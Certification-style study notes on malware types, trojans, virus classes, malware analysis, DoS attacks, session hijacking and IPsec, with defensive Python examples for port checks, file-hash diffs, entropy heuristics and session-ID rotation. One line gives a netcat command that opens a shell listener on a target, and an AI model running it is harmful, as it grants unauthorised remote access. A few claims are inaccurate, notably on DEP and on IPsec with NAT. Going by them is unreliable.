10-Malware and Other Attacks

Malware

Malware Basics

  • Software designed to harm or secretly access a computer system without informed consent

  • Most is downloaded from the Internet with or without the user's knowledge

  • Overt Channels: legitimate communication channels used by programs

  • Covert Channels: used to transport data in unintended ways

  • Wrappers: programs that allow you to bind an executable to an innocent file

    • Example: IExpress Wizard

  • Crypters

    • Using a combination of encryption and code manipulation to render malware undetectable to security programs

    • Example: BitCrypter

  • Packers

    • Compressing the executable into a smaller size and obscuring the actual program, which helps evade signature-based detection

    • Entry point of an executable may refer to a named section of code where the label is the name of a packer

  • Droppers: installing other malware files onto the system, either from the malware package or from the Internet

  • Downloader: downloading other malware from the Internet onto the PC

  • Injector: injecting its code into other vulnerable running processes and changing the way they execute in order to hide or prevent removal

  • Obfuscator: concealing its code, making it hard for security mechanisms to detect or remove it

  • Exploit Kit: helping to deliver exploits and payloads, like Crimepack

Trojan

  • Software that appears to perform a desirable function but instead performs malicious activity

  • To hackers, it is a method to gain and maintain access to a system

  • Trojans are means of delivery whereas a backdoor provides the open access

Types of Trojans

  • Remote Access Trojan (RAT): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and more

    • PoisonIvy

    • MoSucker

    • Blackhole

  • Backdoor Trojan: a RAT has a UI (the client component), whereas a backdoor does not

  • Botnet Trojan: infecting numerous computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center

    • Necurs

    • Mirai

  • E-banking Trojans: intercepting the victim's account information before the system can encrypt it, and sending it to the attacker's C&C center

    • Zeus

  • Proxy Server Trojan: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet

  • Covert Channel Tunneling Trojan (CCTT): a RAT that creates arbitrary data transfer channels inside previously authorized data streams

  • Defacement Trojan: once spread over the system, can destroy or change the entire content present in a database

  • Command Shell Trojan: providing a backdoor to connect to through command-line access

    • Netcat

      • "Swiss army knife" of TCP/IP hacking

      • Providing all sorts of control over a remote shell on a target

      • Can connect over TCP or UDP, from any port

      • Offering DNS forwarding, port mapping and forwarding and proxying

      • Connect to a remote host and port: nc IPaddress Port#

      • Open a listening port 5555 on the target machine that hands out a shell: nc -l -p 5555 -e /bin/bash

    • CryptCat: encrypted version of netcat

Some Trojan Port Numbers

  Trojan Name          Port
  -------------------  ----------
  Death                2
  Senna Spy            20
  Hackers Paradise     31, 456
  TCP Wrappers         421
  Doom, Santaz Back    666
  Silencer, WebEx      1001
  RAT                  1095-98
  SubSeven             1243
  Shiva-Burka          1600
  Trojan Cow           2001
  Deep Throat          6670-71
  NetBus               12345-6
  Whack a Mole         12361-3
  Back Orifice         31337-8
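A defender's use of the table above, as an added example that is not from the original notes: the script parses `netstat -an` style output and flags listening sockets on the listed ports. The port map, the regular expression and the sample netstat lines are constructed for this example; treat a hit as a cue to inspect the owning process, since legitimate services use some of these ports too (port 20 is FTP data, for instance).

```python
import re

# Port-to-name lookup built from the table above (ranges expanded);
# constructed for this example, extend it with your own watch list.
TROJAN_PORTS = {
    2: "Death", 20: "Senna Spy", 31: "Hackers Paradise", 456: "Hackers Paradise",
    421: "TCP Wrappers", 666: "Doom, Santaz Back", 1001: "Silencer, WebEx",
    1243: "SubSeven", 1600: "Shiva-Burka", 2001: "Trojan Cow",
    31337: "Back Orifice", 31338: "Back Orifice",
}
TROJAN_PORTS.update({p: "RAT" for p in range(1095, 1099)})             # 1095-98
TROJAN_PORTS.update({p: "Deep Throat" for p in range(6670, 6672)})     # 6670-71
TROJAN_PORTS.update({p: "NetBus" for p in range(12345, 12347)})        # 12345-6
TROJAN_PORTS.update({p: "Whack a Mole" for p in range(12361, 12364)})  # 12361-3

# One `netstat -an` style line: proto, local addr:port, remote addr, optional state.
SOCKET_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+([A-Z_]+))?\s*$")


def flag_listeners(netstat_lines):
    """Return (port, trojan_name, line) for each bound socket on a listed port.

    TCP sockets count only in the LISTENING state; UDP sockets carry no state
    in netstat output, so any bound UDP port is checked.
    """
    hits = []
    for line in netstat_lines:
        m = SOCKET_RE.match(line)
        if not m:
            continue
        proto, _local_ip, port, _remote, state = m.groups()
        port = int(port)
        if proto.upper() == "TCP" and state != "LISTENING":
            continue
        if port in TROJAN_PORTS:
            hits.append((port, TROJAN_PORTS[port], line.strip()))
    return hits


# Constructed sample output, not captured from a real host.
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:50123     93.184.216.34:443      ESTABLISHED
  TCP    [::]:31337             [::]:0                 LISTENING
  UDP    0.0.0.0:500            *:*
"""

if __name__ == "__main__":
    for port, name, line in flag_listeners(SAMPLE_NETSTAT.splitlines()):
        print(f"port {port} ({name}): {line}")
```

On a real host, pipe `netstat -an` (or `netstat -ano` to get the PID column, which the regex above ignores) into `flag_listeners` and follow each hit back to the process with Process Explorer.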

Tools

  • Process Explorer (PE): Microsoft tool that shows you everything about running processes

  • Registry Monitoring Tools

    • SysAnalyzer

    • Active Registry Monitor

    • Regshot

  • Tripwire: integrity verifier that can act as a HIDS in protection against Trojans

  • SIGVERIF: built into Windows to verify the integrity of the system

    • Log file can be found at c:\windows\system32\sigverif.txt

    • Looks for drivers that are not signed

Virus

  • Self-replicating program that reproduces by attaching copies of itself into other executable code

  • Usually installed by user clicking on malicious file attachments or downloads

Types of Viruses

  • Virus Hoax: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear

  • Fake Antivirus: trying to convince a user that they have a virus and getting them to download an "AV" that is itself a virus

  • Ransomware: malicious software designed to deny access to a computer until a price is paid; usually spread through email

    • Locky: Using RSA-2048 and AES-128 to lock files

    • WannaCry: famous ransomware, within 24 hours had 230,000 victims, exploited unpatched SMB vulnerability

    • Petya-NotPetya: spreading over the network using WMIC (Windows Management Instrumentation Command-line), with all credentials captured from the local machine using Mimikatz

  • Boot Sector Virus: known as system virus, moving boot sector to another location and then inserts its code in the original location

  • Shell Virus: wrapping around an application's code, inserting itself before the application's own code

  • Cluster Virus: modifying directory table entries so every time a file or folder is opened, the virus runs

  • Multipartite Virus

    • Attempting to infect both boot sector and files

    • Generally referring to viruses with multiple infection methods, or executing differently in different places on the target at the same time

  • Macro Virus: written in VBA, infects template files, mostly MS Word and MS Excel

  • Polymorphic Code Virus: mutating its code by using a polymorphic engine; difficult to find because code is always changing

  • Encryption Virus: using encryption to hide the code from antivirus

  • Metamorphic Virus: rewriting itself every time it infects a new file

    • Win32/ Simile

    • Zmist: Mistfall was the first virus to use a technique called code integration; the virus inserts itself into other code, regenerates that code and rebuilds the executable

  • Stealth Virus: known as tunneling virus, attempts to evade AVs by actively altering and corrupting the service call interrupts while running

  • Cavity Virus: overwriting portions of host files so as not to increase the actual size of the file; uses null content sections

  • Armored Virus: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult

  • Companion/Camouflage Virus: spoofing a scanner by camouflaging itself to the identical file name as targeted program file

  • Cluster Virus: modifying directory table entries so that it points users or system processes to the virus code instead of the actual program

  • Sparse Infector Virus

    • Only infecting occasionally, like every tenth program executed

    • Deciding which file to infect based on certain conditions, like a target file with a maximum size of 128 KB

  • File Extension Virus: changing the file extensions of files to take advantage of most people having extension display turned off (readme.txt.vbs shows as readme.txt)

  • Logic Bomb Virus: triggered by a response to an event, such as launching an application or when a specific date/time is reached

Worm

  • Self-replicating malware that sends itself to other computers without human intervention

  • Usually doesn't infect files, just resides in active memory

  • Often used in botnets

Analyzing Malware

  • Sheep Dip: referring to analysis of suspect files

  • Sheep Dip Computer: installed with port monitors, file monitors, network monitors and antivirus software, connects to a network only under strictly controlled conditions

Static Analysis

  • Examining a given executable's binary without running it, to study its functionality and features

  • Tools

    • HashMyFiles: file fingerprinting

    • VirusTotal: online malware scanning

    • PEiD: identifying packing/obfuscation methods

    • Dependency Walker: listing all dependent modules of an executable file

    • IDA Pro: disassembler and debugger

Dynamic Analysis

  • Running malware and identifying changes to the system, usually in a sandbox environment

    1. Make sure you have a good test bed

      • Use a VM with NIC in host-only mode and no open shares

    2. Analyze the malware on the isolated VM in a static state

      • Tools: BinText and UPX help with looking at the binary

    3. Run the malware and check out processes

      • Use Process Monitor, etc. to look at processes

      • Use NetResident, TCPview or even Wireshark to look at network activity

    4. Check and see what files were added, changed, or deleted
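Steps 1 to 4 above, and the Tripwire-style integrity check listed under Tools, come down to one routine: hash every file before the sample runs, hash again afterwards, and diff the two maps. The Python below is an added example, not code from the original notes or from Tripwire; the directory layout and the simulated changes inside demo() are constructed to stand in for step 3 (running the sample).

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map every file below root (path relative to root, '/' separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digests[rel] = h.hexdigest()
    return digests


def diff_snapshots(before, after):
    """Compare two snapshots; returns sorted lists of added, changed and deleted paths."""
    return {
        "added": sorted(p for p in after if p not in before),
        "deleted": sorted(p for p in before if p not in after),
        "changed": sorted(p for p in after if p in before and after[p] != before[p]),
    }


def demo():
    """Constructed scenario in a throwaway directory: baseline, simulated sample run, diff."""
    with tempfile.TemporaryDirectory() as root:
        sys32 = os.path.join(root, "system32")
        os.makedirs(sys32)
        with open(os.path.join(sys32, "hosts"), "w") as f:
            f.write("127.0.0.1 localhost\n")
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("hello\n")
        before = snapshot(root)  # baseline of the clean VM (steps 1-2)

        # Stand-in for "run the sample" (step 3): the changes are made by hand here.
        with open(os.path.join(sys32, "hosts"), "a") as f:
            f.write("0.0.0.0 av-update.example\n")   # hosts file tampered with
        with open(os.path.join(sys32, "svchosts.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)            # look-alike binary dropped
        os.remove(os.path.join(root, "readme.txt"))  # a file removed

        after = snapshot(root)   # step 4: what was added, changed or deleted?
        return diff_snapshots(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

For a real run, point `snapshot()` at the VM's system drive (or the directories you care about) before and after executing the sample; keep the baseline on the host, not inside the VM, so the sample cannot tamper with it.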

Heuristic Analysis

  • Detecting new or unknown viruses that are usually variants of an already existing virus family

  • Drawback: too many false positives

  • Can be static or dynamic

    • Static Heuristic Analysis: The anti-virus analyzes the file format and code structure to determine if the code is viral

    • Dynamic Heuristic Analysis: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral
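Static heuristic analysis, together with the packer notes earlier (a packer leaves its name on a section and the entry point often sits in that section), can be demonstrated with two cheap signals: per-section entropy and section names. The following Python is an added example, not code from the page or from PEiD; the packer name list, the 7.0 bits/byte threshold, the assumption that a normal entry point lives in `.text`, and the byte strings standing in for section contents are all constructed.

```python
import math
from collections import Counter

# Section names some packers leave behind (UPX, ASPack, Petite, MPRESS).
# Illustrative list only; PEiD-style tools carry thousands of signatures.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", ".aspack", ".adata", ".petite", ".MPRESS1", ".MPRESS2"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packing_indicators(sections, entry_section, threshold=7.0):
    """Static heuristics over a list of (section_name, raw_bytes) pairs.

    Returns human-readable reasons; an empty list means nothing suspicious.
    Compressed or encrypted data is close to uniform, so entropy near
    8 bits/byte is the classic packed-section tell.
    """
    reasons = []
    for name, data in sections:
        ent = shannon_entropy(data)
        if ent >= threshold:
            reasons.append(f"section {name!r}: entropy {ent:.2f} bits/byte (>= {threshold})")
        if name in PACKER_SECTION_NAMES:
            reasons.append(f"section {name!r}: known packer section name")
        if name == entry_section and name != ".text":
            reasons.append(f"entry point in {name!r} rather than .text")
    return reasons


# Constructed stand-ins for section contents (no real PE is parsed here):
# a "normal" code section using 64 distinct byte values evenly -> 6.0 bits/byte,
# and a packed-looking section using all 256 values evenly -> 8.0 bits/byte.
BENIGN_SECTIONS = [(".text", bytes(range(64)) * 64), (".data", b"\x00" * 4096)]
PACKED_SECTIONS = [("UPX0", b""), ("UPX1", bytes(range(256)) * 16)]

if __name__ == "__main__":
    print("benign:", packing_indicators(BENIGN_SECTIONS, ".text"))
    print("packed:", packing_indicators(PACKED_SECTIONS, "UPX1"))
```

Real compiled code typically lands around 5 to 6.5 bits/byte; anything above 7 in a section marked executable deserves a closer look, and a high-entropy section holding the entry point is about as clear a packing hint as static analysis gives. Expect false positives from legitimately compressed resources or embedded certificates, which is the drawback noted above for heuristics in general.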

Tools

  • IDA Pro

  • Anubis

  • Threat Analyzer

Preventing Malware

  • Make sure you know what is going on in your system

  • Have a good antivirus that is up to date

  • DEP (Data Execution Prevention): prevents accidental execution of a potentially malicious batch or PowerShell script in Windows

  • DLP (Data Loss Prevention): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network

DoS (Denial of Service) Attacks

  • Seeking to take down a system or deny access to it by authorized users

  • Botnet: network of zombie computers a hacker uses to start a distributed attack

    • Can be controlled over HTTP, HTTPS, IRC, or ICQ

Basic Categories

  • Fragmentation Attack: taking advantage of the system's ability to reconstruct fragmented packets

  • Volumetric Attack: bandwidth attack, consuming all bandwidth for the system or service

  • Application Attack

    • Consuming the resources necessary for the application to run

    • Application level attack is against weak code

    • Application attack is just the general term

  • TCP state-exhaustion Attack: going after load balancers, firewalls and application servers by attacking connection state tables

  • SYN Flood: sending thousands of SYN packets with a fake source IP address and not responding to the SYN/ACK packets; lots of half-open connections where the 3-way handshake is never completed; eventually the target runs out of resources

  • ICMP flood: sending ICMP ECHO packets with a spoofed address; eventually reaches limit of packets per second sent

  • Smurf: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests

  • Fraggle: same as Smurf but with UDP packets

  • Ping of Death: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system

  • Teardrop: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly

  • Phlashing: also known as bricking a system, causing permanent damage to a system

  • LAND Attack (Local Area Network Denial): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes

  • DDoS (Distributed Denial of Service): the incoming traffic flooding the victim originates from many different sources

  • DRDoS (Distributed Reflection Denial of Service): using IP spoofing, the source address is set to the targeted victim, which means all the replies go to the target and flood it

  • Slowloris: trying to keep many connections to the target web server open and hold them open as long as possible

Tools

  • Low Orbit Ion Cannon (LOIC): DDoS tool that floods a target with TCP, UDP or HTTP requests

  • Trinity: Linux based DDoS tool

Session Hijacking

  • Attacker waits for a session to begin and after the victim authenticates, steals the session for himself

  • Sequence prediction can be done by knowing the window size and the packet sequence number

  • Also can be done via brute force, calculation or stealing

Steps

  1. Sniff the traffic between the client and server

  2. Monitor the traffic and predict the sequence numbering

  3. Desynchronize the session with the client

  4. Predict the session token and take over the session

  5. Inject packets to the target server

Countermeasures

  • Using unpredictable session IDs

  • Limiting incoming connections

  • Minimizing remote access

  • Regenerating the session key after authentication

  • Using IPsec to encrypt
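The first and fourth countermeasures above (unpredictable session IDs, regenerating the session key after authentication) in a minimal server-side session table. This is an added example, not code from the original notes; SessionStore, weak_session_id and the login flow are constructed for illustration.

```python
import secrets
import time


def weak_session_id(counter):
    """How NOT to do it (constructed contrast): time plus a counter is guessable by
    anyone who has seen one ID and knows roughly when the target session began."""
    return f"{int(time.time())}-{counter}"


class SessionStore:
    """Minimal server-side session table (constructed for this example)."""

    ID_BYTES = 32  # 256 bits from the OS CSPRNG; brute force and calculation both fail

    def __init__(self):
        self._sessions = {}  # session_id -> {"user": ..., "created": ...}

    def new_session(self):
        sid = secrets.token_urlsafe(self.ID_BYTES)
        self._sessions[sid] = {"user": None, "created": time.time()}
        return sid

    def lookup(self, sid):
        """Session data for sid, or None if the ID is unknown (or rotated away)."""
        return self._sessions.get(sid)

    def login(self, sid, user):
        """Authenticate the session and rotate its ID in the same step.

        An ID sniffed or planted before authentication is now worthless: the old
        key is dropped and the client receives a fresh one with its new privileges."""
        data = self._sessions.pop(sid, None)
        if data is None:
            raise KeyError("unknown session")
        data["user"] = user
        new_sid = secrets.token_urlsafe(self.ID_BYTES)
        self._sessions[new_sid] = data
        return new_sid


if __name__ == "__main__":
    store = SessionStore()
    anon = store.new_session()
    authed = store.login(anon, "alice")
    print("pre-auth id still valid?", store.lookup(anon) is not None)   # False
    print("post-auth session user:", store.lookup(authed)["user"])      # alice
```

The rotation in `login()` is what defeats session fixation and pre-authentication theft; the CSPRNG in `new_session()` is what defeats prediction and brute force. Both are needed: a perfectly random ID that survives the login still lets an attacker who captured it before authentication ride the authenticated session.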

IPsec (Internet Protocol Security)

  • Transport Mode

    • Payload and ESP trailer are encrypted, not IP header

    • Can be used with NAT because the original packet is still routed in exactly the same manner as it would have been without IPsec

  • Tunnel mode

    • Everything is encrypted

    • Cannot be used with NAT

  • Architecture Protocols

    • Authentication Header (AH): guaranteeing the integrity and authentication of the IP packet sender

    • Encapsulating Security Payload (ESP): providing origin authenticity and integrity as well as confidentiality

    • Internet Key Exchange (IKE): producing the keys for the encryption/decryption process, port 500

    • Oakley: using Diffie-Hellman to create master and session keys

    • Internet Security Association Key Management Protocol (ISAKMP): software that facilitates encrypted communication between two endpoints

Tools

  • Ettercap: man-in-the-middle tool and packet sniffer on steroids

  • Zaproxy

  • Paros proxy

  • Burp Suite

  • Hamster

  • IKE-scan: IPsec VPN scanning and fingerprinting tool
